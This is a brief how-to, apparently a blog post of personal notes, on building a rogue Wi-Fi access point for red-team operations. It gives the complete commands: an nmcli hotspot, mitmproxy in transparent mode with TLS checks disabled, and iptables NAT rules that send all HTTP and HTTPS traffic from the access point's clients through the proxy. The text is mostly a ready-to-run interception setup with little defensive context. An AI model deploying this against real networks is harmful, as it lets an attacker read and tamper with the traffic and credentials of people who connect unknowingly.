Hi there! Rogue AP is an amazing technique! You can use it as a part of your Kill Chain for Red Team ops and you can use it for regular researches involving wireless networks.

Nowadays the most of the network traffic is encrypted with TLS or SSL, and you should not only establish the Rogue Access Point but also properly dissect the traffic being received.

Mitmproxy could help with this task. It is an extendable HTTP/HTTPS proxy that’s easy to install and use. No huge configs and monstrous manpages - just plug and play.

Here are my notes about establishing the Rogue AP with MITMProxy in the middle. There are only my notes, not comprehensive usage info, so read docs first.


Deploying AP

nmcli dev wifi hotspot ifname wlan0-or-your-wlan-iface ssid your-wlan-name password "very-secret-password"


Running MITMProxy

Keep in mind that the –ssl-insecure flag also disables the SNI check and allows MiTM attacks on TLS-encrypted traffic, generated by MITMProxy for each user’s TLS-session.

mitmproxy --mode transparent --showhost -p 8080 --ssl-insecure


Redirecting all TCP/80 and TCP/443 traffic to the MITMProxy

export INTERNET_IFACE=eth0
export AP_IFACE=wlan0

iptables -t nat -A PREROUTING -i "$AP_IFACE" -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i "$AP_IFACE" -p tcp --dport 443 -j REDIRECT --to-port 8080

That’s all. Beautiful, isn’t it? Only NetworkManager, MITMProxy and some iptables magic.

Good Luck!

The end